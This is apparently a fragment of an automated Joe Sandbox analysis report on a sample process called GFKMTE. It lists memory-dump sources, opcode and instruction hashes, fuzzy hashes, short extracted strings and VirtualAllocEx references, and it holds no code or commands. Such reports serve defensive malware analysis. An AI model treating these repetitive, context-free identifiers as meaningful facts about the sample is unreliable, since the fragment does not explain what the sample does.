                                                                                                                                                  • Instruction Fuzzy Hash: E281D374E002188FDB14DFA9D584A9DBBF2FF89301F149069E819AB365DB309D46CF60

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: <y$Teq$Teq
                                                                                                                                                  • API String ID: 0-402984361
                                                                                                                                                  • Opcode ID: 36ad292ee9661473dc3c64c943996cbdc69edd2c3ba9d53cacfc5109c26ea6a0
                                                                                                                                                  • Instruction ID: 8c05bded6c8c79ed262377795666545558f2d525c7a9d7d9e23ee7347ec0fc6c
                                                                                                                                                  • Opcode Fuzzy Hash: 36ad292ee9661473dc3c64c943996cbdc69edd2c3ba9d53cacfc5109c26ea6a0
                                                                                                                                                  • Instruction Fuzzy Hash: B8518574E012199FDB08CFA9D985A9EBBF2FF88300F14812AE915B7364DB755906CB50

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: <y$Teq$Teq
                                                                                                                                                  • API String ID: 0-402984361
                                                                                                                                                  • Opcode ID: 6fb951c80496b3b309678a0e3b50283fa7df51783d1cb1d37005ea7b3e9bbd8f
                                                                                                                                                  • Instruction ID: 594f56cd593e752f443cbbbeaa758fe4659407a965552053b8f954cab9f3208f
                                                                                                                                                  • Opcode Fuzzy Hash: 6fb951c80496b3b309678a0e3b50283fa7df51783d1cb1d37005ea7b3e9bbd8f
                                                                                                                                                  • Instruction Fuzzy Hash: 7951D674E012189FDF08CFE9D885A9EBBB2FF89300F14812AE915BB364DB715906CB50

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: ae8cac3203ad9425b933c5b20a8e81b4552991d9cbc5d2429aa27a4e99ca3bee
                                                                                                                                                  • Instruction ID: 67fa89ca84a66e94eb33791e992923a86c5a45c00b1f625a1b112c928945cc67
                                                                                                                                                  • Opcode Fuzzy Hash: ae8cac3203ad9425b933c5b20a8e81b4552991d9cbc5d2429aa27a4e99ca3bee
                                                                                                                                                  • Instruction Fuzzy Hash: 9F518674E012199FDB08CFA9D884A9EFBF2BF88300F148529E915B7364DB755946CF50

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  • Opcode ID: d72b1598f90ed644195823d89364cbd5342343f0a929d31e59cf98cecbd6c208
                                                                                                                                                  • Instruction ID: b3d5d9e3667816b6ee2634efe2ddf88065d39a13dbdba97ac63b13e8f9dcd35c
                                                                                                                                                  • Opcode Fuzzy Hash: d72b1598f90ed644195823d89364cbd5342343f0a929d31e59cf98cecbd6c208
                                                                                                                                                  • Instruction Fuzzy Hash: FA519574E002199FDB08DFA9D884AAEBBF2BF88300F148129E915BB364DB755906CF50

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Teq$Teq
                                                                                                                                                  • API String ID: 0-2938103587
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E3A3B2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E3A3B2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1523028235.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_4e30000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: r
                                                                                                                                                  • API String ID: 0-1812594589
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8q
                                                                                                                                                  • API String ID: 0-4083045702
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8q
                                                                                                                                                  • API String ID: 0-4083045702
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 981e282e46720ea9189b1b66b85aae7e4c31e1b52d478551d873b50d66085fa1
                                                                                                                                                  • Instruction ID: c45c9c00781a4a086330243c6e0b974ac5d3afc78f35b8d68106faff1a15182c
                                                                                                                                                  • Opcode Fuzzy Hash: 981e282e46720ea9189b1b66b85aae7e4c31e1b52d478551d873b50d66085fa1
                                                                                                                                                  • Instruction Fuzzy Hash: 2E018674E04248DFCF14DF65D8419ADBFF1AF56300F1491DAD404AB266D7305E5ADB41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9dc8fa2f636e9168f39290a5849c1c7b8f1107e4d17604c13e18d46645613e0c
                                                                                                                                                  • Instruction ID: 85efe1f782a5acf991ff708f198608ad0c4ac49e1e2cc85f4cc2d65046a40d9e
                                                                                                                                                  • Opcode Fuzzy Hash: 9dc8fa2f636e9168f39290a5849c1c7b8f1107e4d17604c13e18d46645613e0c
                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0A470A04344EFDF05CF65E810A9DBBB1BF56300F15D1D6D504AB262D7305E46DB92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b2cd0e38f2e98efd3d33e5044bcb10b8c18c2a88706f1300e3822eb8a5250a48
                                                                                                                                                  • Instruction ID: 4363813cd026c3fe37bfe3513337517a0b7cad92e0b29f94ba6ffd66f6b215b5
                                                                                                                                                  • Opcode Fuzzy Hash: b2cd0e38f2e98efd3d33e5044bcb10b8c18c2a88706f1300e3822eb8a5250a48
                                                                                                                                                  • Instruction Fuzzy Hash: 0FF0C479A00208EFDB04DFA9CA89E5DBBF1EF49300F65C195E908AB365DA30DE01DB40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3e08c4690994bda102b7b28e67db140273c3dc424d3d2c3a8a0036d5fca5beca
                                                                                                                                                  • Instruction ID: c709b2808f5afc8be2e2b169d1c764ba0e8e4ef09e05f3fa3a0897c272b64f58
                                                                                                                                                  • Opcode Fuzzy Hash: 3e08c4690994bda102b7b28e67db140273c3dc424d3d2c3a8a0036d5fca5beca
                                                                                                                                                  • Instruction Fuzzy Hash: 25F0C979A00108EFDB04DFA9C689E5DBBF5AF48300F55C194E908AB361D730DE01DB40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 90dc1903ee6f91e8215656d04e582e51fa1d4266001bbd46c64db5ab8d870369
                                                                                                                                                  • Instruction ID: ffb87facd96a94d0ce8ea39585d0e88a8cbbeb57d2f9ab6b3e93aedba4528c6c
                                                                                                                                                  • Opcode Fuzzy Hash: 90dc1903ee6f91e8215656d04e582e51fa1d4266001bbd46c64db5ab8d870369
                                                                                                                                                  • Instruction Fuzzy Hash: F8F0EC38A00108EFDB04DFA9CA89E5DBBF1EF49300F65C094E908A7361D630DE45DB41
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 01b0fcf2c73abd4998ccc9d708c3b93f9054fa1b944c03d966452b4053f236ba
                                                                                                                                                  • Instruction ID: c0b03e0d9cff9e91c8d44cca8849c3394b87f78b2cb30cf60d47cf5b4bc2e1ab
                                                                                                                                                  • Opcode Fuzzy Hash: 01b0fcf2c73abd4998ccc9d708c3b93f9054fa1b944c03d966452b4053f236ba
                                                                                                                                                  • Instruction Fuzzy Hash: 1201FB74D04209AFCB40DFA8D5849AEFBF4FF49300F2081A5D854A3350D7309E45CBA1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 85297c05eb9ab0033ecd584ca828dcecf13fc3b8f0f2c912a85d686bdb596c7f
                                                                                                                                                  • Instruction ID: 92af2475bd4188c0d898c9b43959c899860fddc2685c98cd9274ff9c41c406db
                                                                                                                                                  • Opcode Fuzzy Hash: 85297c05eb9ab0033ecd584ca828dcecf13fc3b8f0f2c912a85d686bdb596c7f
                                                                                                                                                  • Instruction Fuzzy Hash: 72F0C230A04348EFDB04CF66D840A9DFFF1AF46304F1492EAD404AB262D7309E46EB84
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea07946c38e02c079da93f49f50064abe49cc93ec1662624badf5d1162f34579
                                                                                                                                                  • Instruction ID: ca8d941518ef01aa47744f963bbdf60758baa35ffa5bdf5b824d89415eacdb20
                                                                                                                                                  • Opcode Fuzzy Hash: ea07946c38e02c079da93f49f50064abe49cc93ec1662624badf5d1162f34579
                                                                                                                                                  • Instruction Fuzzy Hash: 4BC02BB5201B04CFD614ABA6FC0C32833ACA703306FC60090E20E300F08BB00C8AD699
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000015.00000002.1489436659.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_21_2_e90000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 516eb490b6d219bbab9d9593a680f64479631dc5c6b10b594c7c45bc5fb4636e
                                                                                                                                                  • Instruction ID: db553c96e6f878f96c8d6d6704e37a300b2681a62a2f109beba4a5de41110869
                                                                                                                                                  • Opcode Fuzzy Hash: 516eb490b6d219bbab9d9593a680f64479631dc5c6b10b594c7c45bc5fb4636e
                                                                                                                                                  • Instruction Fuzzy Hash: B0C08C35045204AFC3042F96BC0C32872A85B03206F901021D29D204B04BB0088DC6D6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.1489781681.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_1270000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: dq
                                                                                                                                                  • API String ID: 0-4057445327
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.1489781681.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_1270000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9e6e1fec0fe172841f66cce2e73bf3384f3c5ea88e6c6797be0f9ece9d5fc667
                                                                                                                                                  • Instruction ID: 3b2bcb68c1c523fef9f3bdf18a1801ce3cb050a11bcb27b4ed066d72c666aec9
                                                                                                                                                  • Opcode Fuzzy Hash: 9e6e1fec0fe172841f66cce2e73bf3384f3c5ea88e6c6797be0f9ece9d5fc667
                                                                                                                                                  • Instruction Fuzzy Hash: C7216D71E0024A9FCF05DFA8C8509DDBBB5EF4A310F9582A6D550BB361DB30A946CF90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.1489781681.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_1270000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4300479a16d267e13234348e797439591987546923fe07b3ee083f8bc0795abe
                                                                                                                                                  • Instruction ID: a14dfd50ff37fbc8bcfac4c847e873b711e0d734644c1770707a440710b829ed
                                                                                                                                                  • Opcode Fuzzy Hash: 4300479a16d267e13234348e797439591987546923fe07b3ee083f8bc0795abe
                                                                                                                                                  • Instruction Fuzzy Hash: 75216D35D00309DFDB21EF64E884A897BB5FB65304F0045A8E1449F369E7796A4ACF81
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.1489781681.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_1270000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8f6e4a5d97198f1c392f5ca3745a2d0dba8010d40c057a238257b517000a627d
                                                                                                                                                  • Instruction ID: 983f381e75bb1339b3249989d5f250cf6868bc2b2ab54fae597d540c93376bad
                                                                                                                                                  • Opcode Fuzzy Hash: 8f6e4a5d97198f1c392f5ca3745a2d0dba8010d40c057a238257b517000a627d
                                                                                                                                                  • Instruction Fuzzy Hash: CE112E35D00209DFDB21EF64E844A8D7BB5FB64305F008668E1489F369DB796A4ACFC1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.1489781681.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_1270000_GFKMTE.jbxd
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (q
                                                                                                                                                  • API String ID: 0-2414175341
                                                                                                                                                  • Opcode ID: e12e053e6a76421168b27019b2d575d13a259bb1d2ce368a886d88fd10174b7d
                                                                                                                                                  • Instruction ID: d1f513055439f177a00f15617aba895cd03736d8fc1edf87d9cc1629d6c5ddcf
                                                                                                                                                  • Opcode Fuzzy Hash: e12e053e6a76421168b27019b2d575d13a259bb1d2ce368a886d88fd10174b7d
                                                                                                                                                  • Instruction Fuzzy Hash: 8C91F274E01208CFDB18DFA8D594A9EBBB2FF89300F208569D805AB365DB34AD42CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 01dce73bd4598ac3373b02bf55edb658db3a0c607f773d1bac8d8feefc8a72f3
                                                                                                                                                  • Instruction ID: 6ab42e9012c8a02de5cbf296564a57314a616fb1586ddbb019d1f25ec9f4ad7b
                                                                                                                                                  • Opcode Fuzzy Hash: 01dce73bd4598ac3373b02bf55edb658db3a0c607f773d1bac8d8feefc8a72f3
                                                                                                                                                  • Instruction Fuzzy Hash: 19E18F74E012188FDB54CFA9C484ADDFBF5BB48310F159296E819AB369D730A98ACF40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8517c02598e29c85ebae52a367bcd8366d359daab825aaf30478f5ab0eacb3d5
                                                                                                                                                  • Instruction ID: 835aa7012c80aabfcd83f6a7ba1dd8afb335db1a0992fe7b371e010234e439a6
                                                                                                                                                  • Opcode Fuzzy Hash: 8517c02598e29c85ebae52a367bcd8366d359daab825aaf30478f5ab0eacb3d5
                                                                                                                                                  • Instruction Fuzzy Hash: 7D51CEB4D053489FDF20DFA9D990AAEFBF1BF49300F24946AE818AB250DB359941CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 60ec4d6a285732341692b7ca4aae1d70a9ee908968572c6b5b7df336f46a9824
                                                                                                                                                  • Instruction ID: f37e7ebafadb5ea01dffdf99afd09a9185c2b985b9826f7be22fa9f8809bbbd3
                                                                                                                                                  • Opcode Fuzzy Hash: 60ec4d6a285732341692b7ca4aae1d70a9ee908968572c6b5b7df336f46a9824
                                                                                                                                                  • Instruction Fuzzy Hash: 20A19274A01229CFCB24DF99D884BDDB7B1FF49304F1186A6D819BB265E730AA85CF50
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4f86010e44270645fcf0b6394854bf5ac198d772278fa2a3b731d99800ddb2cd
                                                                                                                                                  • Instruction ID: 3cb312a297d16026dd7d8b565df38a47be3ce0a8e6e95dff2260267ff74d23fb
                                                                                                                                                  • Opcode Fuzzy Hash: 4f86010e44270645fcf0b6394854bf5ac198d772278fa2a3b731d99800ddb2cd
                                                                                                                                                  • Instruction Fuzzy Hash: 7C91C474E01208CFDB18DFA8D594A9EBBB2FF89301F208569D805AB365DB35AD42CF54
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bc54d578ac9d4387689c8122b13285a63b5f164b860eb67e03ff949dc651da78
                                                                                                                                                  • Instruction ID: 4c07898c72e7f5ab5b981ca12dba5df6af601ebac7fe801c4dc68196a5ebae30
                                                                                                                                                  • Opcode Fuzzy Hash: bc54d578ac9d4387689c8122b13285a63b5f164b860eb67e03ff949dc651da78
                                                                                                                                                  • Instruction Fuzzy Hash: 7241BDB4D052489FDF10CFAAD980AAEFBF1BF49300F24946AE818BB250DB359945CF54
                                                                                                                                                  Memory Dump Source
